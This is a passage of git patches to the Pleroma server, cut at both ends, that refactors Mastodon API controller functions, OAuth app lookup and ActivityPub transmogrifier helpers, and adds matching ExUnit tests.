with %User{} = user <- get_cached_by_ap_id(ap_id) do
- info_cng =
- user.info
- |> User.Info.remove_from_subscribers(unsubscriber.ap_id)
+ info_cng = User.Info.remove_from_subscribers(user.info, unsubscriber.ap_id)
change(user)
|> put_embed(:info, info_cng)
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 8dfad7a54..e4e0a7ac9 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -447,8 +447,7 @@ def get_context(%{assigns: %{user: user}} = conn, %{"id" => id}) do
grouped_activities <- Enum.group_by(activities, fn %{id: id} -> id < activity.id end) do
result = %{
ancestors:
- StatusView.render(
- "index.json",
+ StatusView.render("index.json",
for: user,
activities: grouped_activities[true] || [],
as: :activity
@@ -456,8 +455,7 @@ def get_context(%{assigns: %{user: user}} = conn, %{"id" => id}) do
|> Enum.reverse(),
# credo:disable-for-previous-line Credo.Check.Refactor.PipeChainStart
descendants:
- StatusView.render(
- "index.json",
+ StatusView.render("index.json",
for: user,
activities: grouped_activities[false] || [],
as: :activity
@@ -746,9 +744,7 @@ def destroy_multiple(%{assigns: %{user: user}} = conn, %{"ids" => ids} = _params
end
def relationships(%{assigns: %{user: user}} = conn, %{"id" => id}) do
- id = List.wrap(id)
- q = from(u in User, where: u.id in ^id)
- targets = Repo.all(q)
+ targets = User.get_all_by_ids(List.wrap(id))
conn
|> put_view(AccountView)
@@ -758,19 +754,15 @@ def relationships(%{assigns: %{user: user}} = conn, %{"id" => id}) do
# Instead of returning a 400 when no "id" params is present, Mastodon returns an empty array.
def relationships(%{assigns: %{user: _user}} = conn, _), do: json(conn, [])
- def update_media(%{assigns: %{user: user}} = conn, data) do
- with %Object{} = object <- Repo.get(Object, data["id"]),
+ def update_media(
+ %{assigns: %{user: user}} = conn,
+ %{"id" => id, "description" => description} = _
+ )
+ when is_binary(description) do
+ with %Object{} = object <- Repo.get(Object, id),
true <- Object.authorize_mutation(object, user),
- true <- is_binary(data["description"]),
- description <- data["description"] do
- new_data = %{object.data | "name" => description}
-
- {:ok, _} =
- object
- |> Object.change(%{data: new_data})
- |> Repo.update()
-
- attachment_data = Map.put(new_data, "id", object.id)
+ {:ok, %Object{data: data}} <- Object.update_data(object, %{"name" => description}) do
+ attachment_data = Map.put(data, "id", object.id)
conn
|> put_view(StatusView)
@@ -778,6 +770,8 @@ def update_media(%{assigns: %{user: user}} = conn, data) do
end
end
+ def update_media(_conn, _data), do: {:error, :bad_request}
+
def upload(%{assigns: %{user: user}} = conn, %{"file" => file} = data) do
with {:ok, object} <-
ActivityPub.upload(
@@ -796,34 +790,23 @@ def upload(%{assigns: %{user: user}} = conn, %{"file" => file} = data) do
def set_mascot(%{assigns: %{user: user}} = conn, %{"file" => file}) do
with {:ok, object} <- ActivityPub.upload(file, actor: User.ap_id(user)),
%{} = attachment_data <- Map.put(object.data, "id", object.id),
- %{type: type} = rendered <-
- StatusView.render("attachment.json", %{attachment: attachment_data}) do
- # Reject if not an image
- if type == "image" do
- # Sure!
- # Save to the user's info
- info_changeset = User.Info.mascot_update(user.info, rendered)
-
- user_changeset =
- user
- |> Changeset.change()
- |> Changeset.put_embed(:info, info_changeset)
-
- {:ok, _user} = User.update_and_set_cache(user_changeset)
-
- conn
- |> json(rendered)
- else
+ %{type: "image"} = rendered <-
+ StatusView.render("attachment.json", %{attachment: attachment_data}),
+ {:ok, _user} = User.update_mascot(user, rendered) do
+ json(conn, rendered)
+ else
+ %{type: _type} = _ ->
render_error(conn, :unsupported_media_type, "mascots can only be images")
- end
+
+ e ->
+ e
end
end
def get_mascot(%{assigns: %{user: user}} = conn, _params) do
mascot = User.get_mascot(user)
- conn
- |> json(mascot)
+ json(conn, mascot)
end
def favourited_by(%{assigns: %{user: user}} = conn, %{"id" => id}) do
@@ -1119,10 +1102,8 @@ def subscribe(%{assigns: %{user: user}} = conn, %{"id" => id}) do
|> put_view(AccountView)
|> render("relationship.json", %{user: user, target: subscription_target})
else
- {:error, message} ->
- conn
- |> put_status(:forbidden)
- |> json(%{error: message})
+ nil -> {:error, :not_found}
+ e -> e
end
end
@@ -1133,10 +1114,8 @@ def unsubscribe(%{assigns: %{user: user}} = conn, %{"id" => id}) do
|> put_view(AccountView)
|> render("relationship.json", %{user: user, target: subscription_target})
else
- {:error, message} ->
- conn
- |> put_status(:forbidden)
- |> json(%{error: message})
+ nil -> {:error, :not_found}
+ e -> e
end
end
@@ -1207,8 +1186,10 @@ def bookmarks(%{assigns: %{user: user}} = conn, params) do
def account_lists(%{assigns: %{user: user}} = conn, %{"id" => account_id}) do
lists = Pleroma.List.get_lists_account_belongs(user, account_id)
- res = ListView.render("lists.json", lists: lists)
- json(conn, res)
+
+ conn
+ |> put_view(ListView)
+ |> render("index.json", %{lists: lists})
end
def list_timeline(%{assigns: %{user: user}} = conn, %{"list_id" => id} = params) do
@@ -1363,7 +1344,7 @@ def login(%{assigns: %{user: %User{}}} = conn, _params) do
@doc "Local Mastodon FE login init action"
def login(conn, %{"code" => auth_token}) do
with {:ok, app} <- get_or_make_app(),
- %Authorization{} = auth <- Repo.get_by(Authorization, token: auth_token, app_id: app.id),
+ {:ok, auth} <- Authorization.get_by_token(app, auth_token),
{:ok, token} <- Token.exchange_token(app, auth) do
conn
|> put_session(:oauth_token, token.token)
@@ -1375,9 +1356,7 @@ def login(conn, %{"code" => auth_token}) do
def login(conn, _) do
with {:ok, app} <- get_or_make_app() do
path =
- o_auth_path(
- conn,
- :authorize,
+ o_auth_path(conn, :authorize,
response_type: "code",
client_id: app.client_id,
redirect_uri: ".",
@@ -1399,31 +1378,12 @@ defp local_mastodon_root_path(conn) do
end
end
+ @spec get_or_make_app() :: {:ok, App.t()} | {:error, Ecto.Changeset.t()}
defp get_or_make_app do
- find_attrs = %{client_name: @local_mastodon_name, redirect_uris: "."}
- scopes = ["read", "write", "follow", "push"]
-
- with %App{} = app <- Repo.get_by(App, find_attrs) do
- {:ok, app} =
- if app.scopes == scopes do
- {:ok, app}
- else
- app
- |> Changeset.change(%{scopes: scopes})
- |> Repo.update()
- end
-
- {:ok, app}
- else
- _e ->
- cs =
- App.register_changeset(
- %App{},
- Map.put(find_attrs, :scopes, scopes)
- )
-
- Repo.insert(cs)
- end
+ App.get_or_make(
+ %{client_name: @local_mastodon_name, redirect_uris: "."},
+ ["read", "write", "follow", "push"]
+ )
end
def logout(conn, _) do
@@ -1432,26 +1392,13 @@ def logout(conn, _) do
|> redirect(to: "/")
end
- def relationship_noop(%{assigns: %{user: user}} = conn, %{"id" => id}) do
- Logger.debug("Unimplemented, returning unmodified relationship")
-
- with %User{} = target <- User.get_cached_by_id(id) do
- conn
- |> put_view(AccountView)
- |> render("relationship.json", %{user: user, target: target})
- end
- end
-
+ # Stubs for unimplemented mastodon api
+ #
def empty_array(conn, _) do
Logger.debug("Unimplemented, returning an empty array")
json(conn, [])
end
- def empty_object(conn, _) do
- Logger.debug("Unimplemented, returning an empty object")
- json(conn, %{})
- end
-
def get_filters(%{assigns: %{user: user}} = conn, _) do
filters = Filter.get_filters(user)
res = FilterView.render("filters.json", filters: filters)
@@ -1570,7 +1517,7 @@ def status_card(%{assigns: %{user: user}} = conn, %{"id" => status_id}) do
json(conn, data)
else
_e ->
- %{}
+ json(conn, %{})
end
end
@@ -1623,7 +1570,7 @@ def account_register(
end
end
- def account_register(%{assigns: %{app: _app}} = conn, _params) do
+ def account_register(%{assigns: %{app: _app}} = conn, _) do
render_error(conn, :bad_request, "Missing parameters")
end
@@ -1682,15 +1629,15 @@ def account_confirmation_resend(conn, params) do
end
end
- def try_render(conn, target, params)
- when is_binary(target) do
+ defp try_render(conn, target, params)
+ when is_binary(target) do
case render(conn, target, params) do
nil -> render_error(conn, :not_implemented, "Can't display this activity")
res -> res
end
end
- def try_render(conn, _, _) do
+ defp try_render(conn, _, _) do
render_error(conn, :not_implemented, "Can't display this activity")
end
diff --git a/lib/pleroma/web/oauth/app.ex b/lib/pleroma/web/oauth/app.ex
index ddcdb1871..cc3fb1ce5 100644
--- a/lib/pleroma/web/oauth/app.ex
+++ b/lib/pleroma/web/oauth/app.ex
@@ -5,6 +5,7 @@
defmodule Pleroma.Web.OAuth.App do
use Ecto.Schema
import Ecto.Changeset
+ alias Pleroma.Repo
@type t :: %__MODULE__{}
@@ -39,4 +40,29 @@ def register_changeset(struct, params \\ %{}) do
changeset
end
end
+
+ @doc """
+ Gets app by attrs or create new with attrs.
+ And updates the scopes if need.
+ """
+ @spec get_or_make(map(), list(String.t())) :: {:ok, App.t()} | {:error, Ecto.Changeset.t()}
+ def get_or_make(attrs, scopes) do
+ with %__MODULE__{} = app <- Repo.get_by(__MODULE__, attrs) do
+ update_scopes(app, scopes)
+ else
+ _e ->
+ %__MODULE__{}
+ |> register_changeset(Map.put(attrs, :scopes, scopes))
+ |> Repo.insert()
+ end
+ end
+
+ defp update_scopes(%__MODULE__{} = app, []), do: {:ok, app}
+ defp update_scopes(%__MODULE__{scopes: scopes} = app, scopes), do: {:ok, app}
+
+ defp update_scopes(%__MODULE__{} = app, scopes) do
+ app
+ |> change(%{scopes: scopes})
+ |> Repo.update()
+ end
end
diff --git a/lib/pleroma/web/twitter_api/twitter_api.ex b/lib/pleroma/web/twitter_api/twitter_api.ex
index 8eda762c7..bfd838902 100644
--- a/lib/pleroma/web/twitter_api/twitter_api.ex
+++ b/lib/pleroma/web/twitter_api/twitter_api.ex
@@ -29,7 +29,7 @@ def register_user(params, opts \\ []) do
captcha_enabled = Pleroma.Config.get([Pleroma.Captcha, :enabled])
# true if captcha is disabled or enabled and valid, false otherwise
captcha_ok =
- if !captcha_enabled do
+ if not captcha_enabled do
:ok
else
Pleroma.Captcha.validate(
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index e18f8f0d1..a331d6455 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -1551,6 +1551,17 @@ test "returns the relationships for the current user", %{conn: conn} do
assert to_string(other_user.id) == relationship["id"]
end
+
+ test "returns an empty list when bad request", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/accounts/relationships", %{})
+
+ assert [] = json_response(conn, 200)
+ end
end
describe "media upload" do
@@ -1752,70 +1763,72 @@ test "respects limit_to_local_content == :unauthenticated for remote user nickna
end
end
- test "mascot upload", %{conn: conn} do
- user = insert(:user)
+ describe "/api/v1/pleroma/mascot" do
+ test "mascot upload", %{conn: conn} do
+ user = insert(:user)
- non_image_file = %Plug.Upload{
- content_type: "audio/mpeg",
- path: Path.absname("test/fixtures/sound.mp3"),
- filename: "sound.mp3"
- }
+ non_image_file = %Plug.Upload{
+ content_type: "audio/mpeg",
+ path: Path.absname("test/fixtures/sound.mp3"),
+ filename: "sound.mp3"
+ }
- conn =
- conn
- |> assign(:user, user)
- |> put("/api/v1/pleroma/mascot", %{"file" => non_image_file})
+ conn =
+ conn
+ |> assign(:user, user)
+ |> put("/api/v1/pleroma/mascot", %{"file" => non_image_file})
- assert json_response(conn, 415)
+ assert json_response(conn, 415)
- file = %Plug.Upload{
- content_type: "image/jpg",
- path: Path.absname("test/fixtures/image.jpg"),
- filename: "an_image.jpg"
- }
+ file = %Plug.Upload{
+ content_type: "image/jpg",
+ path: Path.absname("test/fixtures/image.jpg"),
+ filename: "an_image.jpg"
+ }
- conn =
- build_conn()
- |> assign(:user, user)
- |> put("/api/v1/pleroma/mascot", %{"file" => file})
+ conn =
+ build_conn()
+ |> assign(:user, user)
+ |> put("/api/v1/pleroma/mascot", %{"file" => file})
- assert %{"id" => _, "type" => image} = json_response(conn, 200)
- end
+ assert %{"id" => _, "type" => image} = json_response(conn, 200)
+ end
- test "mascot retrieving", %{conn: conn} do
- user = insert(:user)
- # When user hasn't set a mascot, we should just get pleroma tan back
- conn =
- conn
- |> assign(:user, user)
- |> get("/api/v1/pleroma/mascot")
+ test "mascot retrieving", %{conn: conn} do
+ user = insert(:user)
+ # When user hasn't set a mascot, we should just get pleroma tan back
+ conn =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/pleroma/mascot")
- assert %{"url" => url} = json_response(conn, 200)
- assert url =~ "pleroma-fox-tan-smol"
+ assert %{"url" => url} = json_response(conn, 200)
+ assert url =~ "pleroma-fox-tan-smol"
- # When a user sets their mascot, we should get that back
- file = %Plug.Upload{
- content_type: "image/jpg",
- path: Path.absname("test/fixtures/image.jpg"),
- filename: "an_image.jpg"
- }
+ # When a user sets their mascot, we should get that back
+ file = %Plug.Upload{
+ content_type: "image/jpg",
+ path: Path.absname("test/fixtures/image.jpg"),
+ filename: "an_image.jpg"
+ }
- conn =
- build_conn()
- |> assign(:user, user)
- |> put("/api/v1/pleroma/mascot", %{"file" => file})
+ conn =
+ build_conn()
+ |> assign(:user, user)
+ |> put("/api/v1/pleroma/mascot", %{"file" => file})
- assert json_response(conn, 200)
+ assert json_response(conn, 200)
- user = User.get_cached_by_id(user.id)
+ user = User.get_cached_by_id(user.id)
- conn =
- build_conn()
- |> assign(:user, user)
- |> get("/api/v1/pleroma/mascot")
+ conn =
+ build_conn()
+ |> assign(:user, user)
+ |> get("/api/v1/pleroma/mascot")
- assert %{"url" => url, "type" => "image"} = json_response(conn, 200)
- assert url =~ "an_image"
+ assert %{"url" => url, "type" => "image"} = json_response(conn, 200)
+ assert url =~ "an_image"
+ end
end
test "hashtag timeline", %{conn: conn} do
@@ -2183,23 +2196,51 @@ test "without notifications", %{conn: conn} do
end
end
- test "subscribing / unsubscribing to a user", %{conn: conn} do
- user = insert(:user)
- subscription_target = insert(:user)
+ describe "subscribing / unsubscribing" do
+ test "subscribing / unsubscribing to a user", %{conn: conn} do
+ user = insert(:user)
+ subscription_target = insert(:user)
- conn =
- conn
- |> assign(:user, user)
- |> post("/api/v1/pleroma/accounts/#{subscription_target.id}/subscribe")
+ conn =
+ conn
+ |> assign(:user, user)
+ |> post("/api/v1/pleroma/accounts/#{subscription_target.id}/subscribe")
- assert %{"id" => _id, "subscribing" => true} = json_response(conn, 200)
+ assert %{"id" => _id, "subscribing" => true} = json_response(conn, 200)
- conn =
- build_conn()
- |> assign(:user, user)
- |> post("/api/v1/pleroma/accounts/#{subscription_target.id}/unsubscribe")
+ conn =
+ build_conn()
+ |> assign(:user, user)
+ |> post("/api/v1/pleroma/accounts/#{subscription_target.id}/unsubscribe")
- assert %{"id" => _id, "subscribing" => false} = json_response(conn, 200)
+ assert %{"id" => _id, "subscribing" => false} = json_response(conn, 200)
+ end
+ end
+
+ describe "subscribing" do
+ test "returns 404 when subscription_target not found", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> post("/api/v1/pleroma/accounts/target_id/subscribe")
+
+ assert %{"error" => "Record not found"} = json_response(conn, 404)
+ end
+ end
+
+ describe "unsubscribing" do
+ test "returns 404 when subscription_target not found", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> post("/api/v1/pleroma/accounts/target_id/unsubscribe")
+
+ assert %{"error" => "Record not found"} = json_response(conn, 404)
+ end
end
test "getting a list of mutes", %{conn: conn} do
@@ -2814,6 +2855,15 @@ test "replaces missing description with an empty string", %{conn: conn, user: us
}
}
end
+
+ test "returns empty object when id invalid", %{conn: conn} do
+ response =
+ conn
+ |> get("/api/v1/statuses/9eoozpwTul5mjSEDRI/card")
+ |> json_response(200)
+
+ assert response == %{}
+ end
end
test "bookmarks" do
@@ -3133,6 +3183,18 @@ test "redirects to the saved path after log in", %{conn: conn, path: path} do
assert conn.status == 302
assert redirected_to(conn) == path
end
+ end
+
+ describe "GET /web/login" do
+ test "redirects to /oauth/authorize", %{conn: conn} do
+ app = insert(:oauth_app, client_name: "Mastodon-Local", redirect_uris: ".")
+ conn = get(conn, "/web/login", %{})
+
+ assert conn.status == 302
+
+ assert redirected_to(conn) ==
+ "/oauth/authorize?response_type=code&client_id=#{app.client_id}&redirect_uri=.&scope=read+write+follow+push"
+ end
test "redirects to the getting-started page when referer is not present", %{conn: conn} do
app = insert(:oauth_app, client_name: "Mastodon-Local", redirect_uris: ".")
@@ -3143,6 +3205,18 @@ test "redirects to the getting-started page when referer is not present", %{conn
assert conn.status == 302
assert redirected_to(conn) == "/web/getting-started"
end
+
+ test "redirects to the getting-started page when user assigned", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> get("/web/login", %{})
+
+ assert conn.status == 302
+ assert redirected_to(conn) == "/web/getting-started"
+ end
end
describe "scheduled activities" do
@@ -3401,6 +3475,17 @@ test "Repeated posts that are replies incorrectly have in_reply_to_id null", %{c
end
describe "create account by app" do
+ setup do
+ valid_params = %{
+ username: "lain",
+ email: "lain@example.org",
+ password: "PlzDontHackLain",
+ agreement: true
+ }
+
+ [valid_params: valid_params]
+ end
+
test "Account registration via Application", %{conn: conn} do
conn =
conn
@@ -3444,6 +3529,7 @@ test "Account registration via Application", %{conn: conn} do
username: "lain",
email: "lain@example.org",
password: "PlzDontHackLain",
+ bio: "Test Bio",
agreement: true
})
@@ -3462,6 +3548,18 @@ test "Account registration via Application", %{conn: conn} do
assert token_from_db.user.info.confirmation_pending
end
+ test "returns error when user already registred", %{conn: conn, valid_params: valid_params} do
+ _user = insert(:user, email: "lain@example.org")
+ app_token = insert(:oauth_token, user: nil)
+
+ conn =
+ conn
+ |> put_req_header("authorization", "Bearer " <> app_token.token)
+
+ res = post(conn, "/api/v1/accounts", valid_params)
+ assert json_response(res, 400) == %{"error" => "{\"email\":[\"has already been taken\"]}"}
+ end
+
test "rate limit", %{conn: conn} do
app_token = insert(:oauth_token, user: nil)
@@ -3505,6 +3603,41 @@ test "rate limit", %{conn: conn} do
assert json_response(conn, :too_many_requests) == %{"error" => "Throttled"}
end
+
+ test "returns bad_request if missing required params", %{
+ conn: conn,
+ valid_params: valid_params
+ } do
+ app_token = insert(:oauth_token, user: nil)
+
+ conn =
+ conn
+ |> put_req_header("authorization", "Bearer " <> app_token.token)
+
+ res = post(conn, "/api/v1/accounts", valid_params)
+ assert json_response(res, 200)
+
+ Enum.each(valid_params, fn {attr, _} ->
+ res =
+ conn
+ |> Map.put(
+ :remote_ip,
+ {:rand.uniform(15), :rand.uniform(15), :rand.uniform(15), :rand.uniform(15)}
+ )
+ |> post("/api/v1/accounts", Map.delete(valid_params, attr))
+
+ assert json_response(res, 400) == %{"error" => "Missing parameters"}
+ end)
+ end
+
+ test "returns forbidden if token is invalid", %{conn: conn, valid_params: valid_params} do
+ conn =
+ conn
+ |> put_req_header("authorization", "Bearer " <> "invalid-token")
+
+ res = post(conn, "/api/v1/accounts", valid_params)
+ assert json_response(res, 403) == %{"error" => "Invalid credentials"}
+ end
end
describe "GET /api/v1/polls/:id" do
@@ -3988,4 +4121,115 @@ test "returns suggestions", %{conn: conn, user: user, other_user: other_user} do
]
end
end
+
+ describe "PUT /api/v1/media/:id" do
+ setup do
+ actor = insert(:user)
+
+ file = %Plug.Upload{
+ content_type: "image/jpg",
+ path: Path.absname("test/fixtures/image.jpg"),
+ filename: "an_image.jpg"
+ }
+
+ {:ok, %Object{} = object} =
+ ActivityPub.upload(
+ file,
+ actor: User.ap_id(actor),
+ description: "test-m"
+ )
+
+ [actor: actor, object: object]
+ end
+
+ test "updates name of media", %{conn: conn, actor: actor, object: object} do
+ media =
+ conn
+ |> assign(:user, actor)
+ |> put("/api/v1/media/#{object.id}", %{"description" => "test-media"})
+ |> json_response(:ok)
+
+ assert media["description"] == "test-media"
+ assert refresh_record(object).data["name"] == "test-media"
+ end
+
+ test "returns error wheb request is bad", %{conn: conn, actor: actor, object: object} do
+ media =
+ conn
+ |> assign(:user, actor)
+ |> put("/api/v1/media/#{object.id}", %{})
+ |> json_response(400)
+
+ assert media == %{"error" => "bad_request"}
+ end
+ end
+
+ describe "DELETE /auth/sign_out" do
+ test "redirect to root page", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> delete("/auth/sign_out")
+
+ assert conn.status == 302
+ assert redirected_to(conn) == "/"
+ end
+ end
+
+ describe "GET /api/v1/accounts/:id/lists - account_lists" do
+ test "returns lists to which the account belongs", %{conn: conn} do
+ user = insert(:user)
+ other_user = insert(:user)
+ assert {:ok, %Pleroma.List{} = list} = Pleroma.List.create("Test List", user)
+ {:ok, %{following: _following}} = Pleroma.List.follow(list, other_user)
+
+ res =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/accounts/#{other_user.id}/lists")
+ |> json_response(200)
+
+ assert res == [%{"id" => to_string(list.id), "title" => "Test List"}]
+ end
+ end
+
+ describe "empty_array, stubs for mastodon api" do
+ test "GET /api/v1/accounts/:id/identity_proofs", %{conn: conn} do
+ user = insert(:user)
+
+ res =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/accounts/#{user.id}/identity_proofs")
+ |> json_response(200)
+
+ assert res == []
+ end
+
+ test "GET /api/v1/endorsements", %{conn: conn} do
+ user = insert(:user)
+
+ res =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/endorsements")
+ |> json_response(200)
+
+ assert res == []
+ end
+
+ test "GET /api/v1/trends", %{conn: conn} do
+ user = insert(:user)
+
+ res =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/trends")
+ |> json_response(200)
+
+ assert res == []
+ end
+ end
end
diff --git a/test/web/oauth/app_test.exs b/test/web/oauth/app_test.exs
new file mode 100644
index 000000000..195b8c17f
--- /dev/null
+++ b/test/web/oauth/app_test.exs
@@ -0,0 +1,33 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2018 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.OAuth.AppTest do
+ use Pleroma.DataCase
+
+ alias Pleroma.Web.OAuth.App
+ import Pleroma.Factory
+
+ describe "get_or_make/2" do
+ test "gets exist app" do
+ attrs = %{client_name: "Mastodon-Local", redirect_uris: "."}
+ app = insert(:oauth_app, Map.merge(attrs, %{scopes: ["read", "write"]}))
+ {:ok, %App{} = exist_app} = App.get_or_make(attrs, [])
+ assert exist_app == app
+ end
+
+ test "make app" do
+ attrs = %{client_name: "Mastodon-Local", redirect_uris: "."}
+ {:ok, %App{} = app} = App.get_or_make(attrs, ["write"])
+ assert app.scopes == ["write"]
+ end
+
+ test "gets exist app and updates scopes" do
+ attrs = %{client_name: "Mastodon-Local", redirect_uris: "."}
+ app = insert(:oauth_app, Map.merge(attrs, %{scopes: ["read", "write"]}))
+ {:ok, %App{} = exist_app} = App.get_or_make(attrs, ["read", "write", "follow", "push"])
+ assert exist_app.id == app.id
+ assert exist_app.scopes == ["read", "write", "follow", "push"]
+ end
+ end
+end
From a31af93e1d10d9db8796d86ccda35873697b5a4c Mon Sep 17 00:00:00 2001
From: Maksim Pechnikov
Date: Tue, 10 Sep 2019 16:43:10 +0300
Subject: [PATCH 043/272] added tests /activity_pub/transmogrifier.ex
---
.../web/activity_pub/transmogrifier.ex | 264 +++++++-----------
test/web/activity_pub/transmogrifier_test.exs | 162 +++++++++++
2 files changed, 270 insertions(+), 156 deletions(-)
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 468961bd0..93b3a1f97 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -41,8 +41,7 @@ def fix_object(object, options \\ []) do
end
def fix_summary(%{"summary" => nil} = object) do
- object
- |> Map.put("summary", "")
+ Map.put(object, "summary", "")
end
def fix_summary(%{"summary" => _} = object) do
@@ -50,10 +49,7 @@ def fix_summary(%{"summary" => _} = object) do
object
end
- def fix_summary(object) do
- object
- |> Map.put("summary", "")
- end
+ def fix_summary(object), do: Map.put(object, "summary", "")
def fix_addressing_list(map, field) do
cond do
@@ -73,13 +69,9 @@ def fix_explicit_addressing(
explicit_mentions,
follower_collection
) do
- explicit_to =
- to
- |> Enum.filter(fn x -> x in explicit_mentions end)
+ explicit_to = Enum.filter(to, fn x -> x in explicit_mentions end)
- explicit_cc =
- to
- |> Enum.filter(fn x -> x not in explicit_mentions end)
+ explicit_cc = Enum.filter(to, fn x -> x not in explicit_mentions end)
final_cc =
(cc ++ explicit_cc)
@@ -97,13 +89,19 @@ def fix_explicit_addressing(object, _explicit_mentions, _followers_collection),
def fix_explicit_addressing(%{"directMessage" => true} = object), do: object
def fix_explicit_addressing(object) do
- explicit_mentions =
+ explicit_mentions = Utils.determine_explicit_mentions(object)
+
+ %User{follower_address: follower_collection} =
object
- |> Utils.determine_explicit_mentions()
+ |> Containment.get_actor()
+ |> User.get_cached_by_ap_id()
- follower_collection = User.get_cached_by_ap_id(Containment.get_actor(object)).follower_address
-
- explicit_mentions = explicit_mentions ++ [Pleroma.Constants.as_public(), follower_collection]
+ explicit_mentions =
+ explicit_mentions ++
+ [
+ Pleroma.Constants.as_public(),
+ follower_collection
+ ]
fix_explicit_addressing(object, explicit_mentions, follower_collection)
end
@@ -147,48 +145,25 @@ def fix_addressing(object) do
end
def fix_actor(%{"attributedTo" => actor} = object) do
- object
- |> Map.put("actor", Containment.get_actor(%{"actor" => actor}))
+ Map.put(object, "actor", Containment.get_actor(%{"actor" => actor}))
end
def fix_in_reply_to(object, options \\ [])
def fix_in_reply_to(%{"inReplyTo" => in_reply_to} = object, options)
when not is_nil(in_reply_to) do
- in_reply_to_id =
- cond do
- is_bitstring(in_reply_to) ->
- in_reply_to
-
- is_map(in_reply_to) && is_bitstring(in_reply_to["id"]) ->
- in_reply_to["id"]
-
- is_list(in_reply_to) && is_bitstring(Enum.at(in_reply_to, 0)) ->
- Enum.at(in_reply_to, 0)
-
- # Maybe I should output an error too?
- true ->
- ""
- end
-
+ in_reply_to_id = prepare_in_reply_to(in_reply_to)
object = Map.put(object, "inReplyToAtomUri", in_reply_to_id)
if Federator.allowed_incoming_reply_depth?(options[:depth]) do
- case get_obj_helper(in_reply_to_id, options) do
- {:ok, replied_object} ->
- with %Activity{} = _activity <-
- Activity.get_create_by_object_ap_id(replied_object.data["id"]) do
- object
- |> Map.put("inReplyTo", replied_object.data["id"])
- |> Map.put("inReplyToAtomUri", object["inReplyToAtomUri"] || in_reply_to_id)
- |> Map.put("conversation", replied_object.data["context"] || object["conversation"])
- |> Map.put("context", replied_object.data["context"] || object["conversation"])
- else
- e ->
- Logger.error("Couldn't fetch \"#{inspect(in_reply_to_id)}\", error: #{inspect(e)}")
- object
- end
-
+ with {:ok, replied_object} <- get_obj_helper(in_reply_to_id, options),
+ %Activity{} = _ <- Activity.get_create_by_object_ap_id(replied_object.data["id"]) do
+ object
+ |> Map.put("inReplyTo", replied_object.data["id"])
+ |> Map.put("inReplyToAtomUri", object["inReplyToAtomUri"] || in_reply_to_id)
+ |> Map.put("conversation", replied_object.data["context"] || object["conversation"])
+ |> Map.put("context", replied_object.data["context"] || object["conversation"])
+ else
e ->
Logger.error("Couldn't fetch \"#{inspect(in_reply_to_id)}\", error: #{inspect(e)}")
object
@@ -200,6 +175,22 @@ def fix_in_reply_to(%{"inReplyTo" => in_reply_to} = object, options)
def fix_in_reply_to(object, _options), do: object
+ defp prepare_in_reply_to(in_reply_to) do
+ cond do
+ is_bitstring(in_reply_to) ->
+ in_reply_to
+
+ is_map(in_reply_to) && is_bitstring(in_reply_to["id"]) ->
+ in_reply_to["id"]
+
+ is_list(in_reply_to) && is_bitstring(Enum.at(in_reply_to, 0)) ->
+ Enum.at(in_reply_to, 0)
+
+ true ->
+ ""
+ end
+ end
+
def fix_context(object) do
context = object["context"] || object["conversation"] || Utils.generate_context_id()
@@ -210,8 +201,7 @@ def fix_context(object) do
def fix_attachments(%{"attachment" => attachment} = object) when is_list(attachment) do
attachments =
- attachment
- |> Enum.map(fn data ->
+ Enum.map(attachment, fn data ->
media_type = data["mediaType"] || data["mimeType"]
href = data["url"] || data["href"]
@@ -222,30 +212,23 @@ def fix_attachments(%{"attachment" => attachment} = object) when is_list(attachm
|> Map.put("url", url)
end)
- object
- |> Map.put("attachment", attachments)
+ Map.put(object, "attachment", attachments)
end
def fix_attachments(%{"attachment" => attachment} = object) when is_map(attachment) do
- Map.put(object, "attachment", [attachment])
- |> fix_attachments()
+ fix_attachments(Map.put(object, "attachment", [attachment]))
end
def fix_attachments(object), do: object
def fix_url(%{"url" => url} = object) when is_map(url) do
- object
- |> Map.put("url", url["href"])
+ Map.put(object, "url", url["href"])
end
def fix_url(%{"type" => "Video", "url" => url} = object) when is_list(url) do
first_element = Enum.at(url, 0)
- link_element =
- url
- |> Enum.filter(fn x -> is_map(x) end)
- |> Enum.filter(fn x -> x["mimeType"] == "text/html" end)
- |> Enum.at(0)
+ link_element = Enum.find(url, fn x -> is_map(x) and x["mimeType"] == "text/html" end)
object
|> Map.put("attachment", [first_element])
@@ -263,36 +246,32 @@ def fix_url(%{"type" => object_type, "url" => url} = object)
true -> ""
end
- object
- |> Map.put("url", url_string)
+ Map.put(object, "url", url_string)
end
def fix_url(object), do: object
def fix_emoji(%{"tag" => tags} = object) when is_list(tags) do
- emoji = tags |> Enum.filter(fn data -> data["type"] == "Emoji" and data["icon"] end)
-
emoji =
- emoji
+ tags
+ |> Enum.filter(fn data -> data["type"] == "Emoji" and data["icon"] end)
|> Enum.reduce(%{}, fn data, mapping ->
name = String.trim(data["name"], ":")
